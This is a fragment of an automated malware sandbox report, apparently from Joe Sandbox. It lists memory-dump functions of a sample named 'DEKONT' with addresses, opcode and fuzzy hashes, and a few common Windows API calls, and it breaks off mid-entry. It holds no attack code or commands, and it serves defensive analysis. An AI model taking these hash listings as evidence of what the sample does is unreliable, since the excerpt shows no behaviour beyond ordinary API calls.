Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c30db9bafc24e297c9d3e508be61a4757aad06a11d7b4755991611f6318f79b8
Instruction ID: 07899595014be56944225a9b6d3988332efc00da294dce7e1119edede97daa4d
Opcode Fuzzy Hash: c30db9bafc24e297c9d3e508be61a4757aad06a11d7b4755991611f6318f79b8
Instruction Fuzzy Hash: 68A192B5E016188FEB68CF6AC944B9DBBF2AF89300F14C0AAD40DB7255DB345A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CEB4F0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2b5051b51c6ba8cf3e72fa783baf2ff51361259d77b55e2f12001a70e99ed45
Instruction ID: 66a579ae5eded78fa24601bcaf26345cd0d853129c32bbb2250234cdee64b2bd
Opcode Fuzzy Hash: a2b5051b51c6ba8cf3e72fa783baf2ff51361259d77b55e2f12001a70e99ed45
Instruction Fuzzy Hash: 92A19175E016288FEB68CF6AC944B9DFBF2AF89300F14C0AAD40DA7255DB345A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CED478 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1f6b410dbf5877ebd6c29cc7bc5f3b15b88217a68f91207c01ae6587537829c
Instruction ID: 1c407527de9e55cd29d96f267592e8a91353c3f46d1571605b18fd4ccd2ab04c
Opcode Fuzzy Hash: f1f6b410dbf5877ebd6c29cc7bc5f3b15b88217a68f91207c01ae6587537829c
Instruction Fuzzy Hash: 66A19075E016288FEB68CF6AC944B9DBBF2BF89300F14D0AAD40DA7255DB345A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02DCBF10 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba0436dc65c31860664232dffba1802494c4ef68e265cc9805170f53ad0fd713
Instruction ID: 5b9457b4c8f331895767b1f845f6523b2c552e9ae495fa9ee2891cf9375ce599
Opcode Fuzzy Hash: ba0436dc65c31860664232dffba1802494c4ef68e265cc9805170f53ad0fd713
Instruction Fuzzy Hash: A291D8B4E00209CFDB14DFA9D984A9DBBF2BF89314F24806AE809AB365DB305D41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02DCC7B2 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e8612ec6bda32595836631fdd14031827b141c2a305f6bc9db3a733b7741724
Instruction ID: cba5067c973f23ec20df6d7c8371e1c5a7abe6be46f0de8ee4247dc0d924bf65
Opcode Fuzzy Hash: 4e8612ec6bda32595836631fdd14031827b141c2a305f6bc9db3a733b7741724
Instruction Fuzzy Hash: DC8195B4E10219DFDB14DFA9D994B9DBBF2BF88301F24806AE509AB365DB309941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02DCCA92 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2681a6db4b7b11601b187627371b43540873da9813f105869070ff891c20ec5a
Instruction ID: e9d0bffec81351cc6b5fbb4aa4935d1d942c669aebc9bcc579f38a15463a8812
Opcode Fuzzy Hash: 2681a6db4b7b11601b187627371b43540873da9813f105869070ff891c20ec5a
Instruction Fuzzy Hash: 4681B7B4E01219DFDB14DFA9D994A9DBBF2BF88300F24806AE909AB365DB305D41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02DCC1F0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1085ac0cf2f057eda24fd8068f58e33949c57e22eb33d0bdf12a35ff643251fd
Instruction ID: 6fb16c9121f3ad5c514b468ad18ae6494ad0f9fef9b8b012b4e5e82118fe3f37
Opcode Fuzzy Hash: 1085ac0cf2f057eda24fd8068f58e33949c57e22eb33d0bdf12a35ff643251fd
Instruction Fuzzy Hash: 5A81B6B4E10219CFDB14DFA9D994A9DBBF2BF89300F24806AE449AB365DB309D45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CE90A1 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b631c4dbcf34abea5562e648ba8a9331e2ed12027c88a97723e69a790a9c8e7
Instruction ID: 887945e0aa789276a99af1a9788df7c714c2465eef9c18828ef33957083ff773
Opcode Fuzzy Hash: 2b631c4dbcf34abea5562e648ba8a9331e2ed12027c88a97723e69a790a9c8e7
Instruction Fuzzy Hash: 0E81A174E00218CFDB58DFAAD994B9DBBB2BF89304F20816AD419AB354DB345946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02DCC4D0 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b740e58cd7ee08659e7441b49efb1e175749a384b0677e4dca52fb2bd24e5c16
Instruction ID: aee388ce7d1abc7f4bc4548e86d997369f71bbb0b066a5f73f3a95e57025f585
Opcode Fuzzy Hash: b740e58cd7ee08659e7441b49efb1e175749a384b0677e4dca52fb2bd24e5c16
Instruction Fuzzy Hash: C581A5B4E00219DFDB14DFA9D984A9DBBF2BF88300F24906AE509AB365DB305D41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02DC4B31 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b44701218f6d3e525bbe7b9f4ae6e8a1297da606a3f5b59a4006bd6a356d6227
Instruction ID: 245ac4e552ce70003861aba45de947c6021629e9c7b277fff263424976381ee9
Opcode Fuzzy Hash: b44701218f6d3e525bbe7b9f4ae6e8a1297da606a3f5b59a4006bd6a356d6227
Instruction Fuzzy Hash: 8C8193B4E01219DFDB54DFA9D994A9DBBF2BF88300F248069E809AB365DB349941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02DCBC32 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65cba7abeeecb598d7b5680c225bd20521356ed202ba4815e057d8bf1a49ab5f
Instruction ID: 0e37bb49125c587324b372ffb0d3c5d8d8f7cd171466d1eebeab7ff98fe3131b
Opcode Fuzzy Hash: 65cba7abeeecb598d7b5680c225bd20521356ed202ba4815e057d8bf1a49ab5f
Instruction Fuzzy Hash: C581A6B4E00219DFDB14DFA9D994A9DBBF2BF88305F24806AE409AB365DB309D41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CEB4E0 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32bdd2b43ce1eafdfa4b7c71064b333976be7c9b1d1f22abd4d2053f81a7990d
Instruction ID: 2c27ecf62b62ee01501c3c49d2d10df720a4a861894d9b807af7f3dd31f1a608
Opcode Fuzzy Hash: 32bdd2b43ce1eafdfa4b7c71064b333976be7c9b1d1f22abd4d2053f81a7990d
Instruction Fuzzy Hash: D6719571E016288FEB68CF6AC944B9DFBF2AF89300F14C1AAD40DA7255DB305A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CEAE98 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10bbe502e261d0f92292c410253e5d41522ce52b04251090e102593435b96ad5
Instruction ID: b61b34109dfc157a9d836732a8116f5b1859622a305b0b56ecb37488e03ffabd
Opcode Fuzzy Hash: 10bbe502e261d0f92292c410253e5d41522ce52b04251090e102593435b96ad5
Instruction Fuzzy Hash: 32718571D016188FEB68CF6AC954B9DBBF2AF89300F14C1AAD50DA7254DB345A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CED473 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fafc1c7952db61c43c0ece7bbca2a2e223d172cca369e248ae77b0b96d2629e
Instruction ID: 228ecc67f6819fe21f2502424f9c3f6ab1edea71472faab35201b86e2cef29e4
Opcode Fuzzy Hash: 9fafc1c7952db61c43c0ece7bbca2a2e223d172cca369e248ae77b0b96d2629e
Instruction Fuzzy Hash: 9C717471E016288FEB68CF6AC944B9DFBF2AF89300F14C0AAD40DA7255DB345A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02DCB552 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ef335d54d10834af5b630434a93212fe470ce072bd5ee867518b5c9ea1e80bb
Instruction ID: 49c5676bce779b1b08e2117dd0333859e1caf340e47c456415db1b4aa09475b5
Opcode Fuzzy Hash: 9ef335d54d10834af5b630434a93212fe470ce072bd5ee867518b5c9ea1e80bb
Instruction Fuzzy Hash: B261E9B4E00249DFDB14DFAAD984A9DBBF2FF89304F24806AD804AB365DB349945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CE8A48 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da6932b50f63ed4203e0094727f3fd1675edb01e4c3cb5261661b55cb5ff7ed7
Instruction ID: b04dcfae8b68aae8581f1f3f10b6fbd3ee400e696f3e5a1532349f234aedaa57
Opcode Fuzzy Hash: da6932b50f63ed4203e0094727f3fd1675edb01e4c3cb5261661b55cb5ff7ed7
Instruction Fuzzy Hash: 6541A0B0D016188BEB58DFAAC8547DEFBF2AF88300F24C069D458AB294DB755946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 06CEA848 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 933e7cf046363454c1359fc713991eb141da11d9837c538c1279d786f081590a
Instruction ID: 2ecb5a22a2d1ec86ed41633d175efd97f994abd630ba0003a4659d2b19565fcc
Opcode Fuzzy Hash: 933e7cf046363454c1359fc713991eb141da11d9837c538c1279d786f081590a
Instruction Fuzzy Hash: D04168B1D016188BEB58CF6BD95579AFBF3AFC9300F14C1AAC50CA6264DB740A868F51

Uniqueness

Uniqueness Score: -1.00%

Function 06CEC7C9 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf76c984b0939effc7ed22e057ededcbce2f17d44a50df9cd2e8a82e8d362a11
Instruction ID: 1bd16944151893b9cc2d601d48e70e8d408e9a6be19cced85baa2343fd45007e
Opcode Fuzzy Hash: cf76c984b0939effc7ed22e057ededcbce2f17d44a50df9cd2e8a82e8d362a11
Instruction Fuzzy Hash: 09416BB1D016188BEB58CF6BC9557DAFBF3AFC8304F14C1AAC50CA6264DB740A868F54

Uniqueness

Uniqueness Score: -1.00%

Function 06CEBB27 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 050ba61d6763e98e9c01a486cd22d0fa5bcb3219a8e71cc08cfd24f70abc3b90
Instruction ID: cf559cffd5a2e1fcd3aa3eda6078e8b5e4cec13421e94d579d93cb337385e007
Opcode Fuzzy Hash: 050ba61d6763e98e9c01a486cd22d0fa5bcb3219a8e71cc08cfd24f70abc3b90
Instruction Fuzzy Hash: 9B416B71D016188BEB58CF6BD9557D9FBF3AFC8300F14C1AAC50CA6264DB740A868F54

Uniqueness

Uniqueness Score: -1.00%

Function 06CEC178 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 708037c995f6dc67b63e1e2a3f4cd1551a882acaa1c11cdefcf7f3f15aacc065
Instruction ID: f01224aa46319f91c5d415a6df72a696193c2e26795e800784e885a6883bfd19
Opcode Fuzzy Hash: 708037c995f6dc67b63e1e2a3f4cd1551a882acaa1c11cdefcf7f3f15aacc065
Instruction Fuzzy Hash: 5F4179B1D016188BEB58CF6BC9557D9FAF3AFC9300F04C1AAC50CA6264DB740A868F50

Uniqueness

Uniqueness Score: -1.00%

Function 06CEDABB Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2720731bd8f7a2a58cfec72f2898bd054c18f3f3ed201f1cd5da01e263e4b002
Instruction ID: 42bf66ee7b60cc177efd673326702e1fc41bfb62303d421fba9dcffd5af8629f
Opcode Fuzzy Hash: 2720731bd8f7a2a58cfec72f2898bd054c18f3f3ed201f1cd5da01e263e4b002
Instruction Fuzzy Hash: 044149B1E016188BEB58CF6BC9457D9FAF3AFC8300F14C1AAC50CA6264DB740A868F50

Uniqueness

Uniqueness Score: -1.00%

Function 06CECE23 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730499941689bcd59be81b2aecd334df270802c90ea21bbcaceaca9ea5aa355f
Instruction ID: 9ccfdeaa04ec327ade58168e5456e19fe0bac70bc0125417e3b79f8659b0ae71
Opcode Fuzzy Hash: 730499941689bcd59be81b2aecd334df270802c90ea21bbcaceaca9ea5aa355f
Instruction Fuzzy Hash: 4E415AB1E016188BEB58CF6BD9557D9FBF3AFC9300F14C1AAC50CA6254DB740A868F50

Uniqueness

Uniqueness Score: -1.00%

Function 06CEDAB7 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 436e12974c448cd9cf26abf9bd86ce3f99d7ca91ba30f93783c0a6a0355fa9de
Instruction ID: 47ac1def6315897328a35ad25f418aecf533c97ca2aaae12d7b8354abdb57a65
Opcode Fuzzy Hash: 436e12974c448cd9cf26abf9bd86ce3f99d7ca91ba30f93783c0a6a0355fa9de
Instruction Fuzzy Hash: CF4128B1E016188FEB58CF6BDD54789FAF3AFC9204F14C1AAC50CA6265DB740A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CE7010 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d78788108e29d5e3d9bf28a2ca9a6b5c271b1773dc5906275337615b2c13472a
Instruction ID: 8b012245fa734e294060ec2182004f116cf4b0bcbafbb45dcf3bf887f902b653
Opcode Fuzzy Hash: d78788108e29d5e3d9bf28a2ca9a6b5c271b1773dc5906275337615b2c13472a
Instruction Fuzzy Hash: 6841C270E01248CBEB58DFAAD8546EEFBB2AF88300F24D12AC419AB255DB355946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 06D04B59 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06D04BE6
GetCurrentThread.KERNEL32 ref: 06D04C23
GetCurrentProcess.KERNEL32 ref: 06D04C60
GetCurrentThreadId.KERNEL32 ref: 06D04CB9

Memory Dump Source

Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6f206de121b0eaf7061b56ddac319667b12d1ccf39f21e0f36db16bb63282845
Instruction ID: 0d6ebb05ce61ba17abe07a69c9c26c69c7d5796ea7ce65da2f9c0eb613067b62
Opcode Fuzzy Hash: 6f206de121b0eaf7061b56ddac319667b12d1ccf39f21e0f36db16bb63282845
Instruction Fuzzy Hash: E95178B090034ACFEB54DFAAD948B9EBBF1BF88304F20805AE409A73A0D7355944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 06D04B68 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06D04BE6
GetCurrentThread.KERNEL32 ref: 06D04C23
GetCurrentProcess.KERNEL32 ref: 06D04C60
GetCurrentThreadId.KERNEL32 ref: 06D04CB9

Memory Dump Source

Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 351a9134ae649efae90a039776a44f2a88531163d95da1f9c140d9a750556c87
Instruction ID: d42672a6fa4fb01b374427b700a0ed355edfea9fa0e72988551ecf0816d197f4
Opcode Fuzzy Hash: 351a9134ae649efae90a039776a44f2a88531163d95da1f9c140d9a750556c87
Instruction Fuzzy Hash: 545159B090034ACFEB54DFAAD948B9EBBF1BF88314F208019E519A73A0D7355944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 06D0F6B0 Relevance: 1.7, APIs: 1, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06D0F862

Memory Dump Source

Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b3e6d9f193286afaf9dd5c78f020ba10fd4302737d77837c7ae78c9ec0812977
Instruction ID: f07d552365938a49860778bae55762e0c0e18a2e76bd7ce0e375a695950b94a6
Opcode Fuzzy Hash: b3e6d9f193286afaf9dd5c78f020ba10fd4302737d77837c7ae78c9ec0812977
Instruction Fuzzy Hash: AC814071C09389AFDB52CFA5C850ACDBFB1EF4A300F25819BE854AB262C7359845CF61

Uniqueness

Uniqueness Score: -1.00%

Function 06D0D168 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 60e227f937bc276fd58d018ec9248c7794b24717f42c83e9b655970873998f52
Instruction ID: 84a2e66d9fcbc1033e3ff9924c7225345b2b0dbc3fe184755e30fd936c81dfb7
Opcode Fuzzy Hash: 60e227f937bc276fd58d018ec9248c7794b24717f42c83e9b655970873998f52
Instruction Fuzzy Hash: 80712770A00B058FE764DF6AD45479ABBF2FF88200F008A2ED496D7B90DB75E845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06D0D84C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06D0F862

Memory Dump Source

Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c4502af9c12e466bab10488cde6fca5de22d2697feffdcc322fe510a89d4e432
Instruction ID: 98fc28483ad53c4cc53faa966d03c3ccdd82c680967ed7271f166017f8515849
Opcode Fuzzy Hash: c4502af9c12e466bab10488cde6fca5de22d2697feffdcc322fe510a89d4e432
Instruction Fuzzy Hash: DF51A2B1D00349DFEB14CF9AC884ADEBBB5FF88310F64852AE819AB250D7759845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05B2BFC4 Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.3825646679.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b20000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f590d77437f81365d8c41de6efcb4c347a3a46d7a3d2e99a1e16fe5352b899c1
Instruction ID: 86dc6ad1459fba3713df33346643e12402f56b6e955ab7ab13ca64a74080ceb9
Opcode Fuzzy Hash: f590d77437f81365d8c41de6efcb4c347a3a46d7a3d2e99a1e16fe5352b899c1
Instruction Fuzzy Hash: 11412874A08619DBDB14CF98C4C4AEDFBB2FF48310F249199E419A7385CB31A986CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05B2BF64 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.3825646679.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b20000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9143700b02ac96f906d701c2c0cd6b48f7bf5228060783f4640877161067b5a
Instruction ID: 7ea20e47a1a715d0528593c4eba73570d10e09ceb5c29e7495f81feb3ea7306b
Opcode Fuzzy Hash: f9143700b02ac96f906d701c2c0cd6b48f7bf5228060783f4640877161067b5a
Instruction Fuzzy Hash: B9411774D08619DFDB14CF98D4C4AEDBBB2FF48314F248198E419A7291CB31A986CF60

Uniqueness

Uniqueness Score: -1.00%

Function 05B2BE18 Relevance: 1.6, APIs: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05B2BE79

Memory Dump Source

Source File: 00000003.00000002.3825646679.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b20000_DEKONT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c28d3bc6a473be3280b82eac0df22b991352f8cfd37378f38e0b67489dcd7910
Instruction ID: d6d589752bc24613fa0bd1d7e6f921469b02a1db96a1abcfa977906ff1246f17
Opcode Fuzzy Hash: c28d3bc6a473be3280b82eac0df22b991352f8cfd37378f38e0b67489dcd7910
Instruction Fuzzy Hash: A22129B1D012189BDB14CFA9D884AEEFBF6FF88310F249529E455A7295C770194ACF60

Uniqueness

Uniqueness Score: -1.00%

Function 06D04834 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D04D76,?,?,?,?,?), ref: 06D04E37

Memory Dump Source

Source File: 00000003.00000002.3826390317.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d00000_DEKONT.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a8b436c63d34ec38d938272ea49ba15ec81e8108c036fe4f2f5aaf1030c018c2
Instruction ID: d932f8fd1282b34a0268070f8846d78bb1b20b3dc157f1fdac976333cb59003d
Opcode Fuzzy Hash: a8b436c63d34ec38d938272ea49ba15ec81e8108c036fe4f2f5aaf1030c018c2
Instruction Fuzzy Hash: DA21E5B5900249DFDB10CF9AD884BDEBBF8FB48310F14841AE954A3350D374A950CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06D04DA9 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D04D76,?,?,?,?,?), ref: 06D04E37

Memory Dump Source

